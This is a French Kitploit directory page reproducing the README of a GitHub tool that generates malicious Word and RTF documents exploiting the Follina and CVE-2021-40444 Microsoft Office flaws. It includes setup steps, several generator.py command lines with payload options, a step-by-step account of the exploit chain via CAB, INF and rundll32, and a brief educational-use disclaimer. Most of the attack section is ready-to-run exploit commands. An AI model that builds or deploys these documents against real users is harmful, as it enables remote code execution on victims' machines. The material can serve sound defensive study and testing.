Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/basim-ahmad/follina-cve-and-cve-2021-40444
Génération de PayloadsExploitationExploitation d'Applications WebAnalyse de MalwareTests d'IntrusionApprentissage et Éducation
GitHubbasim-ahmad/follina-cve-and-cve-2021-40444

Follina-CVE-and-CVE-2021-40444

Ce dépôt contient des scripts et des ressources pour exploiter les vulnérabilités Follina CVE et CVE-2021-40444 dans Microsoft Office. Les scripts génèrent des fichiers de documents malveillants capables d'exécuter du code arbitraire sur le système cible.

Voir le dépôt
1il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploitation des vulnérabilités Follina CVE et CVE-2021-40444

Table des matières

  1. Introduction
  2. Prérequis
  3. Configuration et installation
  4. Utilisation
  5. Explication détaillée
  6. Commandes
  7. Avertissement

Introduction

Ce dépôt contient des scripts et des ressources pour exploiter les vulnérabilités Follina CVE et CVE-2021-40444 dans Microsoft Office. Les scripts génèrent des fichiers de documents malveillants capables d'exécuter du code arbitraire sur le système cible.

Prérequis

  • Flare VM
  • Python 3.x
  • Microsoft Word
  • Paquets Python requis (listés dans requirements.txt)

Configuration et installation

  1. Configuration de Flare VM :

  • Assurez-vous d'avoir Flare VM installé. Les identifiants de la VM sont :
    • Nom d'utilisateur : lab
    • Mot de passe : password
  • Python et environnement virtuel :

    root@kitploit:~
    git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
    cd CVE-2021-40444
    
    • Assurez-vous que Python et pip sont installés dans la machine virtuelle.
    • Installez le paquet virtualenv à l'aide de la commande suivante :
      root@kitploit:~
      pip install virtualenv
      
    • Créez un environnement virtuel nommé venv :
      root@kitploit:~
      python -m virtualenv venv
      
    • Activez l'environnement virtuel :
      root@kitploit:~
      venv\Scripts\activate.bat
      
    • Installez les paquets requis :
      root@kitploit:~
      pip install -r requirements.txt
      
  • Utilisation

    1. Génération de l'exploit :

      • Naviguez vers le répertoire du projet et exécutez la commande suivante pour générer l'exploit :
        root@kitploit:~
        python generator.py -u http://192.168.197.132 -P test\calc.dll --host
        
        Remplacez 192.168.197.132 par votre adresse IP.
    2. Accès au document généré :

      • Le fichier .docx généré se trouvera dans le répertoire :
        root@kitploit:~
        C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
        

    Explication détaillée

    Exploitation en chaîne

    • Le document (.docx) est ouvert.
    • Le document contient une relation pointant vers du HTML malveillant stocké dans document.xml.rels.
    • Le lien HTML s'ouvre dans l'aperçu d'IE.
    • Un objet pointe vers un fichier CAB et une iframe pointant vers un fichier INF, tous deux intégrés dans JScript et précédés de la directive ".cpl:".
    • Le fichier CAB s'ouvre, enregistrant le fichier INF dans le répertoire %TEMP%Low.
    • Le fichier INF est ouvert à l'aide de la directive ".cpl:", ce qui amène rundll32 à charger latéralement le fichier INF.

    Aperçu des scripts

    generator.py

    • Implémente un exploit pour CVE-2021-40444, permettant l'exécution de code à distance via Microsoft Office.
    • Contient diverses fonctions utilitaires pour patcher des fichiers CAB, créer des fichiers RAR, générer des payloads, etc.

    cab_parser.py

    • Un outil pour visualiser les en-têtes de fichiers CAB.
    • Définit des classes et méthodes pour gérer et analyser les fichiers CAB.

    Section 2.0 : Configuration dans Flare VM

    • Installez les outils et paquets nécessaires.
    • Créez et activez un environnement virtuel.
    • Installez les paquets Python à partir de requirements.txt.

    Commandes

    • Générez l'exploit original et testez localement :
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\calc.dll --host
      
    • Générez un exploit sans CAB utilisant MS-MSDT (attaque Follina), en documents DOCX et RTF :
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
      
    • Générez un exploit sans CAB (IE uniquement) avec contrebande HTML et testez localement via IE :
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
      
    • Générez un exploit sans CAB avec RAR et testez localement via IE :
      root@kitploit:~
      python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
      

    Avertissement

    Ce projet est uniquement à des fins éducatives. Utilisez-le de manière responsable et n'exploitez pas les vulnérabilités sur des systèmes pour lesquels vous n'avez pas l'autorisation de tester. Une mauvaise utilisation de ces informations peut entraîner des poursuites pénales.

    Télécharger l’outil